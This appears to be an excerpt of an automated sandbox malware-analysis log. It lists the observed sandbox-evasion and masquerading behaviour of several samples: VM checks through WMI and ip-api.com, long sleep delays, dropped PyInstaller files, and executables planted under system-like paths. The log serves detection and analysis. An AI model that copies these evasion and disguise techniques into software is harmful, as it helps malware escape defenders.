                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Brokercrt\comReviewsession.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 14C0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeMemory allocated: 1B1E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: AD0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 29F0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeMemory allocated: 2800000 memory reserve | memory write watch
                        Source: C:\Brokercrt\comReviewsession.exeMemory allocated: 16B0000 memory reserve | memory write watch
                        Source: C:\Brokercrt\comReviewsession.exeMemory allocated: 1B2F0000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeMemory allocated: 2FB0000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeMemory allocated: 920000 memory reserve | memory write watch
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeMemory allocated: 1A3C0000 memory reserve | memory write watch
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeMemory allocated: 1640000 memory reserve | memory write watch
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeMemory allocated: 1B190000 memory reserve | memory write watch
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeMemory allocated: C30000 memory reserve | memory write watch
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeMemory allocated: 1A800000 memory reserve | memory write watch
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeMemory allocated: 10B0000 memory reserve | memory write watch
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeMemory allocated: 1AD20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599844
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599732
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599609
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599493
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599374
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599188
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599031
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598922
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598804
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598702
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598575
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598367
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598234
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598109
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597959
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Brokercrt\comReviewsession.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 6565
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeWindow / User API: threadDelayed 3244
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 1289
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeWindow / User API: threadDelayed 805
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7566
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 610
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6607
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7521
                        Source: C:\Brokercrt\comReviewsession.exeWindow / User API: threadDelayed 526
                        Source: C:\Brokercrt\comReviewsession.exeWindow / User API: threadDelayed 643
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4012
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeWindow / User API: threadDelayed 365
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeWindow / User API: threadDelayed 362
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeWindow / User API: threadDelayed 362
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeWindow / User API: threadDelayed 365
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeWindow / User API: threadDelayed 363
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pydJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-16912
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeAPI coverage: 6.5 %
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8548Thread sleep time: -23980767295822402s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -600000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599844s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599732s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599609s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599493s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599374s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599188s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -599031s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598922s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598804s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598702s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598575s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598367s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598234s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -598109s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488Thread sleep time: -597959s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328Thread sleep time: -30000s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7312Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep count: 7566 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716Thread sleep count: 610 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824Thread sleep time: -8301034833169293s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 6607 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep count: 117 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Brokercrt\comReviewsession.exe TID: 7660Thread sleep count: 526 > 30
                        Source: C:\Brokercrt\comReviewsession.exe TID: 3384Thread sleep count: 643 > 30
                        Source: C:\Brokercrt\comReviewsession.exe TID: 7464Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep count: 4012 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 99 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 8152Thread sleep count: 365 > 30
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 9160Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 1744Thread sleep count: 362 > 30
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 8456Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe TID: 9004Thread sleep count: 362 > 30
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe TID: 8752Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 7772Thread sleep count: 365 > 30
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9020Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9140Thread sleep count: 363 > 30
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9168Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Brokercrt\comReviewsession.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\SysWOW64\it-IT\dasHost.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,1_2_00007FF76D5C85A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76D5C79B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 1_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_0029A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,2_2_0029A5F4
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,2_2_002AB8E0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,3_2_00007FF76D5C85A0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF76D5C79B0
                        Source: C:\Users\user\AppData\Local\Temp\Built.exeCode function: 3_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF76D5E0B84
                        Source: C:\Users\user\AppData\Local\Temp\svchosts.exeCode function: 2_2_002ADD72 VirtualQuery,GetSystemInfo,2_2_002ADD72
                        Source: C:\Users\user\AppData\Local\Temp\XClient.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 600000
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599844
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599732
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599609
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599493
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599374
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599188
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 599031
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598922
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598804
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598702
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598575
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598367
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598234
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 598109
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 597959
                        Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
